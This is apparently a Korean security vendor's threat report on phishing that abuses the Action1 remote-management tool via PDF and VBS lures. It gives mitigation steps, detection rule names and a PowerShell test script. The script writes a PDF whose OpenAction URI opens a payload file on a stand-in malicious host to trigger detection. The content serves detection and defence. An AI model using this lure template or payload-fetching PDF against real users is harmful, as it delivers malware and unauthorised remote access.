RMM 도구 악용, 지속적으로 증가하는 위협 캠페인
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
위협 행위자들은 원격 관리 및 모니터링(RMM) 도구, 특히 Action1을 악용하여 손상된 환경에서 지속적인 접근을 설정하고 있습니다. 공격은 피해자를 VBS 파일로 리디렉션하는 악성 PDF를 포함한 피싱 이메일로 시작됩니다. 이 스크립트는 정당한 Action1 에이전트를 포함하는 MSI 패키지를 다운로드하고 설치하여 무단 원격 접근을 가능하게 합니다.
조사
조사 결과, Vercel에 호스팅된 URL에서 다운로드를 시작하기 위해 OpenAction 및 URI 키워드를 활용하는 악성 PDF가 발견되었습니다. 회수된 MSI 패키지의 분석에서는 벤더의 자체 클라우드 인프라를 통해 오용되고 있는 정품 Action1 Corporation 파일이 확인되었습니다. 설치된 에이전트는 특정 CustomerID를 포함하며 정품 Action1 도메인과 통신합니다.
완화
조직은 OpenAction 또는 URI 키워드를 포함하는 의심스러운 PDF 구조를 식별하기 위해 이메일 필터링을 구성해야 합니다. 보안 팀은 무단 RMM 도구 설치 및 A1Agent 서비스 생성을 모니터링해야 합니다. 예기치 않은 RMM 클라우드 인프라로의 연결 차단 및 비정상적이거나 무단인 CustomerID 식별이 원격 접근 오용의 위험을 더욱 줄일 수 있습니다.
대응
악성 RMM 활동이 탐지되면 추가 원격 명령 실행을 방지하기 위해 영향을 받은 호스트를 격리하십시오. 원래의 피싱 이메일을 조사하고 관련된 VBS 및 MSI 파일에 대한 포렌식 분석을 수행하십시오. 잠재적으로 손상된 자격 증명을 철회하고, 무단 원격 접근 또는 지속의 징후가 있는지 확인하기 위해 Action1 에이전트 구성을 검토하십시오.
공격 흐름
이 부분은 아직 업데이트 중입니다.
탐지
LOLBAS WScript / CScript (프로세스 생성 경유)
대체 원격 접근 / 관리 소프트웨어 (프로세스 생성 경유)
서드 파티 서비스 / 도구를 통한 가능한 데이터 침투 / 유출 / C2 (프록시 경유)
서드 파티 서비스 / 도구를 통한 가능한 데이터 침투 / 유출 / C2 (DNS 경유)
원격 접근 소프트웨어 도메인 통신 시도에 의한 가능한 명령 및 제어 활동 (DNS 경유)
탐지할 IOC(HashSha256): 야생에서의 추가 RMM 도구
Action1 회사 서버로의 원격 연결 [Windows 네트워크 연결]
악성 VBS로 리디렉션되는 PDF OpenAction 및 URI [Windows 파일 이벤트]
시뮬레이션 실행
-
공격 내러티브 및 명령: 공격자는 피싱 캠페인을 시뮬레이션하고 있습니다. 목표는 이름이
Transaction Receipt .pdf라는 파일을 피해자에게 전달하는 것입니다. PDF는 사용자가 열자마자 즉시/OpenAction커맨드가/URI리디렉션을 트리거하도록 특별히 제작되었습니다. 이 리디렉션은 악성 VBScript를 제공하는 사이트로 사용자를 이끄는 것을 목표로 합니다. 제공된 특정 탐지 룰을 트리거하려면 정확한 이름과 내부 문자열을 요구하는 파일을 만들어야 합니다. -
회귀 테스트 스크립트:
# 시뮬레이션 스크립트: PDF OpenAction 탐지 트리거 $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf" # 탐지 키워드와 일치하는 "악성" PDF 콘텐츠 제작 $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # 'file_event' 탐지를 트리거하기 위해 파일을 디스크에 쓰기 $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "시뮬레이션 파일이 생성되었습니다: $targetFile" Write-Host "SIEM에서 탐지 경고를 확인하십시오." -
정리 명령:
# 정리: 시뮬레이트된 악성 파일 제거 $targetFile = "$env:USERPROFILEDesktopTransaction Receipt .pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "정리 완료: $targetFile 제거됨." } else { Write-Host "정리: 파일을 찾을 수 없음." }